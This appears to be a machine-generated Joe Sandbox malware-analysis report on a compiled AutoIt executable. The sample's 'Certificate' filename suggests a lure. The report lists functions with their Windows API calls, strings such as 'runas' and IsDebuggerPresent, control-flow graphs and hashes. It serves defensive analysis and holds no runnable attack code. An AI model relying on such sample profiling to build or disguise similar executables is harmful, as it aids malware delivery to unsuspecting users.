                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: bd7c2a650fe2e8bfecc8169422f7d0d61976d560a847f8f404ddcb4a2418d71d
                                                                                • Instruction ID: 078125d352442d48d8db5ab5ee5832d8841265c6655371875864c92220d41e62
                                                                                • Opcode Fuzzy Hash: bd7c2a650fe2e8bfecc8169422f7d0d61976d560a847f8f404ddcb4a2418d71d
                                                                                • Instruction Fuzzy Hash: EB324E75A122288FDB249F18DC81AE9B7B5FF46318F1940E9E40AE7A51D7309EC1CF52
                                                                                Function 00843D19 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151windowCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00843AA3,?), ref: 00843D45
                                                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,00843AA3,?), ref: 00843D57
                                                                                • GetFullPathNameW.KERNEL32(00007FFF,?,?,00901148,00901130,?,?,?,?,00843AA3,?), ref: 00843DC8
                                                                                  • Part of subcall function 00846430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00843DEE,00901148,?,?,?,?,?,00843AA3,?), ref: 00846471
                                                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,00843AA3,?), ref: 00843E48
                                                                                • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,008F28F4,00000010), ref: 008B1CCE
                                                                                • SetCurrentDirectoryW.KERNEL32(?,00901148,?,?,?,?,?,00843AA3,?), ref: 008B1D06
                                                                                • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,008DDAB4,00901148,?,?,?,?,?,00843AA3,?), ref: 008B1D89
                                                                                • ShellExecuteW.SHELL32(00000000,?,?,?,?,00843AA3), ref: 008B1D90
                                                                                  • Part of subcall function 00843E6E: GetSysColorBrush.USER32(0000000F), ref: 00843E79
                                                                                  • Part of subcall function 00843E6E: LoadCursorW.USER32(00000000,00007F00), ref: 00843E88
                                                                                  • Part of subcall function 00843E6E: LoadIconW.USER32(00000063), ref: 00843E9E
                                                                                  • Part of subcall function 00843E6E: LoadIconW.USER32(000000A4), ref: 00843EB0
                                                                                  • Part of subcall function 00843E6E: LoadIconW.USER32(000000A2), ref: 00843EC2
                                                                                  • Part of subcall function 00843E6E: RegisterClassExW.USER32(?), ref: 00843F30
                                                                                  • Part of subcall function 008436B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 008436E6
                                                                                  • Part of subcall function 008436B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00843707
                                                                                  • Part of subcall function 008436B8: ShowWindow.USER32(00000000,?,?,?,?,00843AA3,?), ref: 0084371B
                                                                                  • Part of subcall function 008436B8: ShowWindow.USER32(00000000,?,?,?,?,00843AA3,?), ref: 00843724
                                                                                  • Part of subcall function 00844FFC: _memset.LIBCMT ref: 00845022
                                                                                  • Part of subcall function 00844FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 008450CB
                                                                                Strings
                                                                                • runas, xrefs: 008B1D84
                                                                                • This is a third-party compiled AutoIt script., xrefs: 008B1CC8
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                                                                • String ID: This is a third-party compiled AutoIt script.$runas
                                                                                • API String ID: 438480954-3287110873
                                                                                • Opcode ID: ce367bee73f389619da55c16395ba5f3558a4a77e353c56cdb3b7c8518b1b6b0
                                                                                • Instruction ID: 977a39257c88c6284757f8a8c6538a08ebfca841109d9c735ad3259f4aa758b3
                                                                                • Opcode Fuzzy Hash: ce367bee73f389619da55c16395ba5f3558a4a77e353c56cdb3b7c8518b1b6b0
                                                                                • Instruction Fuzzy Hash: 1D511530A0C34CAFCF11ABB8DC45EED7B79FF15704F004065F611E62A2DA7446499B22
                                                                                Function 0085DDC0 Relevance: 10.7, APIs: 7, Instructions: 175COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1138 85ddc0-85de4f call 84d7f7 GetVersionExW call 846a63 call 85dfb4 call 846571 1147 85de55-85de56 1138->1147 1148 8b24c8-8b24cb 1138->1148 1149 85de92-85dea2 call 85df77 1147->1149 1150 85de58-85de63 1147->1150 1151 8b24cd 1148->1151 1152 8b24e4-8b24e8 1148->1152 1169 85dea4-85dec1 GetCurrentProcess call 85df5f 1149->1169 1170 85dec7-85dee1 1149->1170 1155 8b244e-8b2454 1150->1155 1156 85de69-85de6b 1150->1156 1158 8b24d0 1151->1158 1153 8b24ea-8b24f3 1152->1153 1154 8b24d3-8b24dc 1152->1154 1153->1158 1161 8b24f5-8b24f8 1153->1161 1154->1152 1159 8b245e-8b2464 1155->1159 1160 8b2456-8b2459 1155->1160 1162 8b2469-8b2475 1156->1162 1163 85de71-85de74 1156->1163 1158->1154 1159->1149 1160->1149 1161->1154 1165 8b247f-8b2485 1162->1165 1166 8b2477-8b247a 1162->1166 1167 8b2495-8b2498 1163->1167 1168 85de7a-85de89 1163->1168 1165->1149 1166->1149 1167->1149 1173 8b249e-8b24b3 1167->1173 1174 8b248a-8b2490 1168->1174 1175 85de8f 1168->1175 1169->1170 1188 85dec3 1169->1188 1171 85df31-85df3b GetSystemInfo 1170->1171 1172 85dee3-85def7 call 85e00c 1170->1172 1181 85df0e-85df1a 1171->1181 1185 85df29-85df2f GetSystemInfo 1172->1185 1186 85def9-85df01 call 85dff4 GetNativeSystemInfo 1172->1186 1178 8b24bd-8b24c3 1173->1178 1179 8b24b5-8b24b8 1173->1179 1174->1149 1175->1149 1178->1149 1179->1149 1183 85df21-85df26 1181->1183 1184 85df1c-85df1f FreeLibrary 1181->1184 1184->1183 1190 85df03-85df07 1185->1190 1186->1190 1188->1170 1190->1181 1192 85df09-85df0c FreeLibrary 1190->1192 1192->1181
                                                                                APIs
                                                                                • GetVersionExW.KERNEL32(?), ref: 0085DDEC
                                                                                • GetCurrentProcess.KERNEL32(00000000,008DDC38,?,?), ref: 0085DEAC
                                                                                • GetNativeSystemInfo.KERNELBASE(?,008DDC38,?,?), ref: 0085DF01
                                                                                • FreeLibrary.KERNEL32(00000000,?,?), ref: 0085DF0C
                                                                                • FreeLibrary.KERNEL32(00000000,?,?), ref: 0085DF1F
                                                                                • GetSystemInfo.KERNEL32(?,008DDC38,?,?), ref: 0085DF29
                                                                                • GetSystemInfo.KERNEL32(?,008DDC38,?,?), ref: 0085DF35
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
                                                                                • String ID:
                                                                                • API String ID: 3851250370-0
                                                                                • Opcode ID: 33990ce7e348d4682565e2c48f23e19fc00e798b1bf148a1b923f41ac982e116
                                                                                • Instruction ID: 188c13fc7332c9b1e1a0e493ae566f9ff1c569802ec5de053c1ee6cfa21158c4
                                                                                • Opcode Fuzzy Hash: 33990ce7e348d4682565e2c48f23e19fc00e798b1bf148a1b923f41ac982e116
                                                                                • Instruction Fuzzy Hash: 37619FB180A388DBCF25DF6898C15E97FB4BF29305B1989D9DC45DF207C624890DCB6A
                                                                                Function 0084406B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1210 84406b-844083 CreateStreamOnHGlobal 1211 844085-84409c FindResourceExW 1210->1211 1212 8440a3-8440a6 1210->1212 1213 8440a2 1211->1213 1214 8b4f16-8b4f25 LoadResource 1211->1214 1213->1212 1214->1213 1215 8b4f2b-8b4f39 SizeofResource 1214->1215 1215->1213 1216 8b4f3f-8b4f4a LockResource 1215->1216 1216->1213 1217 8b4f50-8b4f6e 1216->1217 1217->1213
                                                                                APIs
                                                                                • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,0084449E,?,?,00000000,00000001), ref: 0084407B
                                                                                • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,0084449E,?,?,00000000,00000001), ref: 00844092
                                                                                • LoadResource.KERNEL32(?,00000000,?,?,0084449E,?,?,00000000,00000001,?,?,?,?,?,?,008441FB), ref: 008B4F1A
                                                                                • SizeofResource.KERNEL32(?,00000000,?,?,0084449E,?,?,00000000,00000001,?,?,?,?,?,?,008441FB), ref: 008B4F2F
                                                                                • LockResource.KERNEL32(0084449E,?,?,0084449E,?,?,00000000,00000001,?,?,?,?,?,?,008441FB,00000000), ref: 008B4F42
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                • String ID: SCRIPT
                                                                                • API String ID: 3051347437-3967369404
                                                                                • Opcode ID: 9b5a13c205fface46a3f7451093ba5edd0caab0d5717efe815a2d6ab37241aa2
                                                                                • Instruction ID: 2453fa029e425b47c2d8ab6d3dc6f8312da64772a2151c4ff98dac543f812198
                                                                                • Opcode Fuzzy Hash: 9b5a13c205fface46a3f7451093ba5edd0caab0d5717efe815a2d6ab37241aa2
                                                                                • Instruction Fuzzy Hash: AC11FA71200705AFE7219B65EC49F67BBB9FBC5B51F14456CF612D62A0DAB1EC008A60
                                                                                Function 00886CA9 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetFileAttributesW.KERNELBASE(?,008B2F49), ref: 00886CB9
                                                                                • FindFirstFileW.KERNELBASE(?,?), ref: 00886CCA
                                                                                • FindClose.KERNEL32(00000000), ref: 00886CDA
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: FileFind$AttributesCloseFirst
                                                                                • String ID:
                                                                                • API String ID: 48322524-0
                                                                                • Opcode ID: d5a311ed85c934b4b30b2b464c4297e9e0d4ee1ef535266bd5b865ed9001252a
                                                                                • Instruction ID: c10e3a6060d1be7a5bb01f9bf42df8f67f133ec366c80c3ea117bc98a1d6b3f8
                                                                                • Opcode Fuzzy Hash: d5a311ed85c934b4b30b2b464c4297e9e0d4ee1ef535266bd5b865ed9001252a
                                                                                • Instruction Fuzzy Hash: DCE01A31814615AB82207738EC0D8AAB6ADFB06339F14472AF976C21E0EB709954869A
                                                                                Function 00853B70 Relevance: 2.2, Strings: 1, Instructions: 903COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Exception@8Throwstd::exception::exception
                                                                                • String ID: @
                                                                                • API String ID: 3728558374-2766056989
                                                                                • Opcode ID: 12d857c23561370a7cc01678940d49c88d32d4c9e7e1559327d04a64d83bf181
                                                                                • Instruction ID: 8aa060b05bc7d88a5488c8dc074a750081cdbbbd323b7a27003022c875f74243
                                                                                • Opcode Fuzzy Hash: 12d857c23561370a7cc01678940d49c88d32d4c9e7e1559327d04a64d83bf181
                                                                                • Instruction Fuzzy Hash: 73729C70904209AFCF14DF98C481AAEB7B5FF48345F14805AED06EB391DB35AE49CB92
                                                                                Function 00853200 Relevance: 1.0, Instructions: 986COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: BuffCharUpper
                                                                                • String ID:
                                                                                • API String ID: 3964851224-0
                                                                                • Opcode ID: 69b6e8439ceb9196e218c32f9b66e9607f053939aecea53c06e0b1a999ca50ee
                                                                                • Instruction ID: b14cbff28bf35f2781ddf29f1ed757bd5f660f8cfbba51fbf66cd52231b19d04
                                                                                • Opcode Fuzzy Hash: 69b6e8439ceb9196e218c32f9b66e9607f053939aecea53c06e0b1a999ca50ee
                                                                                • Instruction Fuzzy Hash: 4C9247706083419FD724DF18C484B6ABBE1FF88348F14886DE99ACB362D775E949CB52
                                                                                Function 0084E8D0 Relevance: 49.8, APIs: 24, Strings: 4, Instructions: 816windowsleeptimeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0084E959
                                                                                • timeGetTime.WINMM ref: 0084EBFA
                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0084ED2E
                                                                                • TranslateMessage.USER32(?), ref: 0084ED3F
                                                                                • DispatchMessageW.USER32(?), ref: 0084ED4A
                                                                                • LockWindowUpdate.USER32(00000000), ref: 0084ED79
                                                                                • DestroyWindow.USER32 ref: 0084ED85
                                                                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0084ED9F
                                                                                • Sleep.KERNEL32(0000000A), ref: 008B5270
                                                                                • TranslateMessage.USER32(?), ref: 008B59F7
                                                                                • DispatchMessageW.USER32(?), ref: 008B5A05
                                                                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 008B5A19
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                                                                • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                                • API String ID: 2641332412-570651680
                                                                                • Opcode ID: ca5ddb64a7b8cb738c868f6193436d41089a267e7e7f62da342199bffebf1a5f
                                                                                • Instruction ID: fa2ed7dbb3c513cfba0af2c958134b4426b2587df3e5a036ddf2a3a7fe705d59
                                                                                • Opcode Fuzzy Hash: ca5ddb64a7b8cb738c868f6193436d41089a267e7e7f62da342199bffebf1a5f
                                                                                • Instruction Fuzzy Hash: 9A628E70508348DFEB24DF28C885BAA77E4FF54304F18496DF98ADB292DB759848CB52
                                                                                Function 00875C78 Relevance: 47.9, APIs: 26, Strings: 1, Instructions: 626fileCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ___createFile.LIBCMT ref: 00875EC3
                                                                                • ___createFile.LIBCMT ref: 00875F04
                                                                                • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00875F2D
                                                                                • __dosmaperr.LIBCMT ref: 00875F34
                                                                                • GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 00875F47
                                                                                • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00875F6A
                                                                                • __dosmaperr.LIBCMT ref: 00875F73
                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00875F7C
                                                                                • __set_osfhnd.LIBCMT ref: 00875FAC
                                                                                • __lseeki64_nolock.LIBCMT ref: 00876016
                                                                                • __close_nolock.LIBCMT ref: 0087603C
                                                                                • __chsize_nolock.LIBCMT ref: 0087606C
                                                                                • __lseeki64_nolock.LIBCMT ref: 0087607E
                                                                                • __lseeki64_nolock.LIBCMT ref: 00876176
                                                                                • __lseeki64_nolock.LIBCMT ref: 0087618B
                                                                                • __close_nolock.LIBCMT ref: 008761EB
                                                                                  • Part of subcall function 0086EA9C: CloseHandle.KERNELBASE(00000000,008EEEF4,00000000,?,00876041,008EEEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0086EAEC
                                                                                  • Part of subcall function 0086EA9C: GetLastError.KERNEL32(?,00876041,008EEEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0086EAF6
                                                                                  • Part of subcall function 0086EA9C: __free_osfhnd.LIBCMT ref: 0086EB03
                                                                                  • Part of subcall function 0086EA9C: __dosmaperr.LIBCMT ref: 0086EB25
                                                                                  • Part of subcall function 00867C0E: __getptd_noexit.LIBCMT ref: 00867C0E
                                                                                • __lseeki64_nolock.LIBCMT ref: 0087620D
                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00876342
                                                                                • ___createFile.LIBCMT ref: 00876361
                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0087636E
                                                                                • __dosmaperr.LIBCMT ref: 00876375
                                                                                • __free_osfhnd.LIBCMT ref: 00876395
                                                                                • __invoke_watson.LIBCMT ref: 008763C3
                                                                                • __wsopen_helper.LIBCMT ref: 008763DD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                                                                • String ID: @
                                                                                • API String ID: 3896587723-2766056989
                                                                                • Opcode ID: a84865f918484433e29dba2266631999c84d4b857f7d13d2615eea71c8503aa7
                                                                                • Instruction ID: f7d58f5d723aff2e75db7f707d7007a351bc680868100ac6311b5e4da6e776f3
                                                                                • Opcode Fuzzy Hash: a84865f918484433e29dba2266631999c84d4b857f7d13d2615eea71c8503aa7
                                                                                • Instruction Fuzzy Hash: 36224971904A099FEB259F68CC45BBD7B21FB10328F28C128E529E72DAE775CD60C791
                                                                                Function 0088FA0C Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 238COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • _wcscpy.LIBCMT ref: 0088FA96
                                                                                • _wcschr.LIBCMT ref: 0088FAA4
                                                                                • _wcscpy.LIBCMT ref: 0088FABB
                                                                                • _wcscat.LIBCMT ref: 0088FACA
                                                                                • _wcscat.LIBCMT ref: 0088FAE8
                                                                                • _wcscpy.LIBCMT ref: 0088FB09
                                                                                • __wsplitpath.LIBCMT ref: 0088FBE6
                                                                                • _wcscpy.LIBCMT ref: 0088FC0B
                                                                                • _wcscpy.LIBCMT ref: 0088FC1D
                                                                                • _wcscpy.LIBCMT ref: 0088FC32
                                                                                • _wcscat.LIBCMT ref: 0088FC47
                                                                                • _wcscat.LIBCMT ref: 0088FC59
                                                                                • _wcscat.LIBCMT ref: 0088FC6E
                                                                                  • Part of subcall function 0088BFA4: _wcscmp.LIBCMT ref: 0088C03E
                                                                                  • Part of subcall function 0088BFA4: __wsplitpath.LIBCMT ref: 0088C083
                                                                                  • Part of subcall function 0088BFA4: _wcscpy.LIBCMT ref: 0088C096
                                                                                  • Part of subcall function 0088BFA4: _wcscat.LIBCMT ref: 0088C0A9
                                                                                  • Part of subcall function 0088BFA4: __wsplitpath.LIBCMT ref: 0088C0CE
                                                                                  • Part of subcall function 0088BFA4: _wcscat.LIBCMT ref: 0088C0E4
                                                                                  • Part of subcall function 0088BFA4: _wcscat.LIBCMT ref: 0088C0F7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                                                                                • String ID: >>>AUTOIT SCRIPT<<<
                                                                                • API String ID: 2955681530-2806939583
                                                                                • Opcode ID: d6b4d67f68e528296fb9e017a0a4610172bf3b21b1fb181fd682f4399c298bea
                                                                                • Instruction ID: b2c39a84439a5ab3bce3ff75a6e8303f67dccc1b2f0725ec96af0a93e6d40cbd
                                                                                • Opcode Fuzzy Hash: d6b4d67f68e528296fb9e017a0a4610172bf3b21b1fb181fd682f4399c298bea
                                                                                • Instruction Fuzzy Hash: 8391A171504305AFCB20EF58C951E9BB3E9FF94310F004969FA99D7292DB34EA44CB96
                                                                                Function 00843F53 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetSysColorBrush.USER32(0000000F), ref: 00843F86
                                                                                • RegisterClassExW.USER32(00000030), ref: 00843FB0
                                                                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00843FC1
                                                                                • InitCommonControlsEx.COMCTL32(?), ref: 00843FDE
                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00843FEE
                                                                                • LoadIconW.USER32(000000A9), ref: 00844004
                                                                                • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00844013
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                • API String ID: 2914291525-1005189915
                                                                                • Opcode ID: 3813639218cc89d73fdfb2058b9216a096a4bb587d38693fccd29cd88d0927da
                                                                                • Instruction ID: 21a07735c56a65fd0064815fed99b211c34c0fa8e70c961f300b2cdde71db079
                                                                                • Opcode Fuzzy Hash: 3813639218cc89d73fdfb2058b9216a096a4bb587d38693fccd29cd88d0927da
                                                                                • Instruction Fuzzy Hash: B921D6B5D14318AFDB00EFA4EC89BCDBBB4FB08704F00822AFA15A62A0D7B54544DF91
                                                                                Function 0088BFA4 Relevance: 18.3, APIs: 12, Instructions: 316fileCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                  • Part of subcall function 0088BDB4: __time64.LIBCMT ref: 0088BDBE
                                                                                  • Part of subcall function 00844517: _fseek.LIBCMT ref: 0084452F
                                                                                • __wsplitpath.LIBCMT ref: 0088C083
                                                                                  • Part of subcall function 00861DFC: __wsplitpath_helper.LIBCMT ref: 00861E3C
                                                                                • _wcscpy.LIBCMT ref: 0088C096
